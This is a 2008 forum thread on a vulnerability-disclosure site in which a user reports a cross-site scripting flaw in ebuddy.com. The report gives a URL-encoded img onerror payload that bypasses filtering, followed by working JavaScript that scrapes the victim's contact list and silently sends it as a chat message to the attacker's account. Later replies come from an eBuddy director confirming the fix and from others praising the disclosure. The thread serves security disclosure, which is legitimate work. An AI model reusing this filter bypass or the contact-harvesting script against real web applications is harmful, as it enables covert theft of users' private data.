Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
eBuddy.com Xss
Posted by: Jiu
Date: March 31, 2008 12:06PM

Hi

I find a vulnerability in ebuddy.com. You can send javascript in img or iframe, but you must encode the code.

<img src=. onerror="alert('xss');"> wont work but if you send %3cimg src=. onerror=%27alert(%22xss%22);%27%3e, the javascript will execute

http://img442.imageshack.us/my.php?image=proof3go4.jpg

So i just wrote that to steal the contact list

if(window.XMLHttpRequest)
x = new XMLHttpRequest();
else if(window.ActiveXObject)
x = new ActiveXObject("Microsoft.XMLHTTP");
m=document.getElementById("contacts_tree");
cd=new Array();

peds=m.innerHTML.split("nogroup_");
for(i=1;i<peds.length;i++){
	cd.push(peds.split("_msn-")[0]);	
}

cont="";
h=_udl.search.split("=")[1].substring(0,32);
for(i=0;i<cd.length;i++){
cont+=cd+"\n";
if(cont.length > 1150 || i==cd.length-1){
    data="e_hash="+h+"&e_action=send_message&e_user=****@hotmail.com&e_message="+cont+"&e_format=FN=Verdana; EF=; CO=000000; CS=0; PF=00; RL=0&e_network=MSN&_=";
    x.open("POST",Core.EMSN_URL,false);
    x.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
    x.setRequestHeader("Content-Length",data.length);
    x.send(data);
    cont="";
}
}

The ebuddy's user doens see that he send you a message with all his contact ^^

http://img505.imageshack.us/my.php?image=proof1pu7.jpg

I alerted the ebuddy's team about that, and they will correct this hole

Cya
Jiu

Options: ReplyQuote
Re: eBuddy.com Xss
Posted by: nverdo
Date: April 03, 2008 11:05AM

Jiu Wrote:
>
> I alerted the ebuddy's team about that, and they
> will correct this hole
>

The fix has been released to our servers. Thanks Jui for making us aware of this vulnerability.

Niels
Director Development eBuddy

Options: ReplyQuote
Re: eBuddy.com Xss
Posted by: LUPUS
Date: January 06, 2009 04:06AM

Ebuddy.com , xss vuln. fixed.. :(

--

Options: ReplyQuote
Re: eBuddy.com Xss
Date: January 07, 2009 05:19PM

=o) awesome! Kudos to ebuddy for fixing it so fast.

Options: ReplyQuote
Re: eBuddy.com Xss
Posted by: Malkav
Date: January 08, 2009 05:14AM

kudos to ebuddy for quick reaction, and acknowledging here the disclosure. we want to see more of that

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Options: ReplyQuote


Sorry, only registered users may post in this forum.